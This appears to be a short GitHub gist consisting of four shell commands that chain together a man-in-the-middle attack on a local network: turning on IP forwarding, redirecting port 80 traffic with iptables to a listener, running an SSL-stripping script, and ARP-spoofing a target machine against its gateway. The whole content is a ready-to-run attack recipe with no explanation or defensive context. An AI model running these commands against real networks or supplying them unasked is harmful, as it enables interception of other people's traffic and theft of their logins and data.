Skip to content

Instantly share code, notes, and snippets.

@ddouhine
Created December 16, 2014 15:36
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ddouhine/4a2e4f3b726c23b8dc8b to your computer and use it in GitHub Desktop.
Save ddouhine/4a2e4f3b726c23b8dc8b to your computer and use it in GitHub Desktop.
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listen-port>
./ssltrip.py -l <listen-port>
arpspoof -i eth0 -t <target_IP> <gateway_IP>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment